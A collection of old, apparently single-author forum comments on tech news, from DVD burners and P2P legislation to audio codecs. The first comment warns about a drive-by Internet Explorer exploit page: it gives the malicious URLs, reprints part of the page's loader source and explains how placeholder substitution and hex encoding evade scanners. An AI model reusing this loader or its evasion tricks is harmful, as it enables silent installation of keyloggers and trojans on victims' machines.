Which i learned about right here of course.
http://www.stud.uni-karlsruhe.de/~unk6/translux
I found this page yesterday, it is an exploit of this vulnerability.
WARNING - IF YOU ARE USING IE, THIS PAGE WILL LOAD SEVERAL EXPLOITS INTO YOUR SYSTEM - NOTABLY SHERLOK2.EXE (KEY LOGGER) AND REG33.EXE (DISABLED WINDOWS UPDATE). YOU HAVE BEEN WARNED!
The link is here.
http://hard-virgins.com/sher/test.html
For those who don't want to follow it, here is the page source.
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'m
</script>
<apple
</body></html>
This loads and runs the x.chm file from
http://hard-virgins.com/sher/x.chm
and also the loader.jar file from
http://hard-virgins.com/sher/loader.jar
Loader.jar contains the Byte.Verify Trojan to gain full access.
Notice the use of ${PR} and then substitution for the exploit code. I don't know exactly why they did that, maybe to stop scanners that check object data. Also note the use of the hex m (m) instead of just the char 'm'. This gives the 'ms-its' type but will get by dumb scanners (read enterprise firewall filters).
I was still pondering why in the world they would be loading a help file when i saw this story, so thanks for answering my question.
BTW, if you are running NAV2004 with fairly recent definitions (reg33.exe, sherlok2.exe, and parser.class are fairly old exploits) then Norton will stop these exploits from running and delete them, but they still get on your system just fine.
So careful out there, this exploit is dangerous.
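A defensive sketch of the scanner point in the comment above, added here as an example and not part of the original post: a filter that only inspects raw `<object data=...>` values misses both the `${PR}` placeholder and the entity-encoded `m`, while one that decodes character references first and scans the whole page catches them. The function names, the scheme list and the sample page (placeholder host, elided path) are constructed for illustration.

```python
import html
import re

# Handlers named in the comment above; an assumed, not exhaustive, rule set.
SUSPECT_SCHEMES = re.compile(r"\b(ms-its|mhtml)\s*:", re.IGNORECASE)
OBJECT_DATA = re.compile(r"<object\b[^>]*\bdata\s*=\s*[\"']([^\"']*)[\"']", re.IGNORECASE)
PLACEHOLDER = re.compile(r"\$\{\w+\}")

# Constructed sample mirroring the structure described in the comment;
# example.invalid is a placeholder host and the path is deliberately elided.
SAMPLE = r"""
<textarea id="t" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script>
document.write(t.value.replace(/\${PR}/g,
  '&#x6d;s-its:mhtml:<elided>!http://example.invalid/x.chm'));
</script>
"""

def normalize(text):
    """Decode character references until the text stops changing."""
    for _ in range(5):  # bounded, so nested encodings cannot loop forever
        decoded = html.unescape(text)
        if decoded == text:
            break
        text = decoded
    return text

def naive_scan(page):
    """Attribute-only check on the raw bytes, as a simple filter would do."""
    return [m.group(1) for m in OBJECT_DATA.finditer(page)
            if SUSPECT_SCHEMES.search(m.group(1))]

def normalized_scan(page):
    """Decode first, then flag suspect handlers anywhere in the page and
    <object data> values that are only a placeholder filled in by script."""
    text = normalize(page)
    schemes = sorted({m.group(1).lower() for m in SUSPECT_SCHEMES.finditer(text)})
    placeholders = [d for d in OBJECT_DATA.findall(text) if PLACEHOLDER.fullmatch(d)]
    return {"schemes": schemes, "placeholder_object_data": placeholders}

if __name__ == "__main__":
    print("naive:", naive_scan(SAMPLE))
    print("normalized:", normalized_scan(SAMPLE))
```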
Let me rephrase, a full quality single disc backup.
Xvid is great and all, but it is noticeably different than the regular DVD quality.
I didn't pay for a kickass TV to watch mediocre quality copies.
Figure six-nine months till they double the speed, so roughly a 23 minute burn, and then i'll have to buy one. I, and many people i know, have been waiting to buy a burner until such time as i could make a single disc backup of a full length dvd.
The time is now, apparently.
The pumping will be done for you.
And here i am doing my own pumping like a sucker.
They say they aren't reporting your information to the police, "even though [they] should be." Should be for what? Downloading your dustbunny program? Is that illegal now because you seem to be purposefully giving it away.
What would these tools be telling the cops?
"These people downloaded our program."
"Is your program copyrighted?"
"Umm, no, but it is mislabeled!"
Morons.
I am actually on the Dish networks side on this one; what Viacom is trying to do with their crappy channel bundling is a joke. That said however, CBS has CSI and Survivor, for most people $1/month is nowhere near good enough.
They are essentially trying to blackmail the Dish network into taking a crappy network they don't want that is way overpriced. Screw them.
I'm sure it's true that the plain old cell phones are dying away; have you tried to buy a "plain" cell phone lately? It's very difficult, almost all of them have color screens, cameras, et al.
Combine that with the fact that most cell phones break after a few years, and so need to be replaced by these new fancy ones, and the new ones "dominate."
I never really liked any of the Duke games.
I found this little quote interesting . . .
Custom kernel building was not performed since most customers would not be willing or able to perform or support such a customized environment.
Mandrake is good stuff, and getting better every release. Kudos!
. . . for the new Anthony Hamilton CD is because he's goddamn horrible.
From the bill:
"(4) Approximately 40 percent of users of peer-to-peer systems are juveniles." - And whose ass exactly did they pull that stat from?
"Peer-to-peer systems also pose serious security and privacy threats to users." - As if this bill doesn't pose 100x more of a threat.
"Among other things, peer-to-peer software often gives others access to all the files that are stored on a user's hard drive, and many users, including juvenile users and their parents, do not even know of these threats." - Only if it has a bug (which any program could, most noticeably WINDOWS), or you ignore everything it tells you and you set it up completely wrong, which is your own fault.
I bet it still gets the weather wrong.
Umm, auto-tuners have been around for a very long time, this is old news.
Where are the machines they used for LOTR:TT? Are the special effect demands going to be so much greater that they need this monster?
Would you miss it? really?
When 2.4.18 came out, i thought to myself "well i'll just wait till 2.4.19 comes out to switch to 2.4, shouldn't be more than a month or so."
Since then i've had to renew my drivers license three times.
Longest . . . update . . . ever!
It's my opinion, i don't need lab results. I'm just stating my opinion.
Speaking as an audiophile and an audio engineer, and strictly referring to sound quality: mp3pro is better.
"MIT prof Stuart Madnick, testifying on MS's behalf, was caught out twice when a government attorney asked him to name an OS (other than one made by Microsoft) where the browser couldn't be removed. Madnick also faltered on several other questions."
What does that question have to do with ANYTHING? He was there to testify as to how hard it would be to remove IE from windows, not to discuss browser integration in other platforms. He said it would be hard to do in windows, how does the fact that it would be easy to do in linux have ANY relevance about what he said?
Prof: "40^2 = 1600"
Lawyer: "Ok, well can you think of any numbers that when squared don't equal 1600?"
Prof: "Well yes . . . "
Lawyer: "Ahh ha!"
Wow how sweet is that, that's where i go anyway, it's like 5 minutes from my house. Course i'll probly never notice the difference, but hey, always up for something new.
My problem with Ogg is sound quality. Now don't get me wrong, i'm not saying it's worse than mp3, but i don't think it's any better (i know there are "expert" polls that say otherwise, but i've also seen "expert" polls that agree as well). Either way however, it doesn't sound as good as mp3pro (imo, and i'm something of an expert myself), and the files are larger! I realize Ogg is much more widespread than mp3pro, but i doubt that will last long.
I do understand that there are situations where you need a "free" codec; and in that case i say go Ogg. But, for the rest of the time, i say go mp3pro!
Anyone remember the original Video Blaster from like 1992? Full screen video in windows 3.11, too bad it didn't really do anything else.